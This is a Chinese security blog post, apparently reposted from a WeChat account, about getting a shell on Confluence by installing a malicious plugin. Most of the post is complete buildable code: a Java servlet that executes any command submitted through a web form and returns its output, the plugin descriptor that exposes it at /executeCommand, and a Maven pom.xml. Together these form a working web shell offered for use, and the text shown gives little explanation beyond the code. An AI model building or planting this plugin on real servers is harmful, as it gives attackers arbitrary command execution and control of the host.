0x01 前言
https://www.jianshu.com/p/a69f815d9e67
0x02 脚本代码
CommandExecutor.java
package com.jenseny.confluence.tutorial.macro; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.io.PrintWriter; public class CommandExecutor extends HttpServlet { @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException { // Write the HTML form to the response. PrintWriter writer = resp.getWriter(); writer.write("<html><body>"); writer.write("<form method=\"post\">"); writer.write("Command: <input type=\"text\" name=\"command\">"); writer.write("<input type=\"submit\" value=\"Execute\">"); writer.write("</form>"); writer.write("</body></html>"); } @Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws IOException { String command = req.getParameter("command"); // Execute the command and get the output. Process process = Runtime.getRuntime().exec(command); BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream())); StringBuilder output = new StringBuilder(); String line; while ((line = reader.readLine()) != null) { output.append(line).append("\n"); } // Write the output to the response. resp.setContentType("text/plain"); resp.getWriter().write(output.toString()); } }
atlassian-plugin.xml
<atlassian-plugin key="${atlassian.plugin.key}" name="${project.name}" plugins-version="2"> <plugin-info> <description>${project.description}</description> <version>${project.version}</version> <vendor name="${project.organization.name}" url="${project.organization.url}" /> <param name="plugin-icon">images/pluginIcon.png</param> <param name="plugin-logo">images/pluginLogo.png</param> </plugin-info> <servlet name="Command Executor Servlet" key="CommandExecutor" class="com.jenseny.confluence.tutorial.macro.CommandExecutor"> <description>A servlet to execute shell commands from a form.</description> <url-pattern>/executeCommand</url-pattern> </servlet> </atlassian-plugin>
pom.xml
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>com.jenseny.confluence.tutorial</groupId> <artifactId>Command-Executor</artifactId> <version>1.0.0-SNAPSHOT</version> <organization> <name>Example Company</name> <url>http://www.example.com/</url> </organization> <name>Command-Executor</name> <description>test.</description> <packaging>atlassian-plugin</packaging> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>4.10</version> <scope>test</scope> </dependency> <dependency> <groupId>javax.servlet</groupId> <artifactId>javax.servlet-api</artifactId> <version>4.0.1</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.atlassian.confluence</groupId> <artifactId>confluence</artifactId> <version>${confluence.version}</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.atlassian.plugin</groupId> <artifactId>atlassian-spring-scanner-annotation</artifactId> <version>${atlassian.spring.scanner.version}</version> <scope>compile</scope> </dependency> <dependency> <groupId>com.atlassian.plugin</groupId> <artifactId>atlassian-spring-scanner-runtime</artifactId> <version>${atlassian.spring.scanner.version}</version> <scope>runtime</scope> </dependency> <dependency> <groupId>javax.inject</groupId> <artifactId>javax.inject</artifactId> <version>1</version> <scope>provided</scope> </dependency> <!-- WIRED TEST RUNNER DEPENDENCIES --> <dependency> <groupId>com.atlassian.plugins</groupId> <artifactId>atlassian-plugins-osgi-testrunner</artifactId> <version>${plugin.testrunner.version}</version> <scope>test</scope> </dependency> <dependency> <groupId>javax.ws.rs</groupId> <artifactId>jsr311-api</artifactId> <version>1.1.1</version> <scope>provided</scope> </dependency> <dependency> <groupId>com.google.code.gson</groupId> <artifactId>gson</artifactId> <version>2.2.2-atlassian-1</version> </dependency> </dependencies> <build> <plugins> <plugin> <groupId>com.atlassian.maven.plugins</groupId> <artifactId>confluence-maven-plugin</artifactId> <version>${amps.version}</version> <extensions>true</extensions> <configuration> <productVersion>${confluence.version}</productVersion> <productDataVersion>${confluence.data.version}</productDataVersion> <enableQuickReload>true</enableQuickReload> <!-- See here for an explanation of default instructions: --> <!-- https://developer.atlassian.com/docs/advanced-topics/configuration-of-instructions-in-atlassian-plugins --> <instructions> <Atlassian-Plugin-Key>${atlassian.plugin.key}</Atlassian-Plugin-Key> <!-- Add package to export here --> <Export-Package> com.jenseny.confluence.tutorial.api, </Export-Package> <!-- Add package import here --> <Import-Package> org.springframework.osgi.*;resolution:="optional", org.eclipse.gemini.blueprint.*;resolution:="optional", * </Import-Package> <!-- Ensure plugin is spring powered --> <Spring-Context>*</Spring-Context> </instructions> </configuration> </plugin> <plugin> <groupId>com.atlassian.plugin</groupId> <artifactId>atlassian-spring-scanner-maven-plugin</artifactId> <version>${atlassian.spring.scanner.version}</version> <executions> <execution> <goals> <goal>atlassian-spring-scanner</goal> </goals> <phase>process-classes</phase> </execution> </executions> <configuration> <scannedDependencies> <dependency> <groupId>com.atlassian.plugin</groupId> <artifactId>atlassian-spring-scanner-external-jar</artifactId> </dependency> </scannedDependencies> <verbose>false</verbose> </configuration> </plugin> </plugins> </build> <properties> <confluence.version>6.14.0</confluence.version> <confluence.data.version>6.14.0</confluence.data.version> <amps.version>8.0.2</amps.version> <plugin.testrunner.version>2.0.1</plugin.testrunner.version> <atlassian.spring.scanner.version>1.2.13</atlassian.spring.scanner.version> <!-- This property ensures consistency between the key in atlassian-plugin.xml and the OSGi bundle's key. --> <atlassian.plugin.key>${project.groupId}.${project.artifactId}</atlassian.plugin.key> <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> <maven.compiler.source>1.8</maven.compiler.source> <maven.compiler.target>1.8</maven.compiler.target> </properties> </project>
0x03 漏洞复现
原文始发于微信公众号(小黑说安全):Confluence CommandExecutor插件Getshell
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论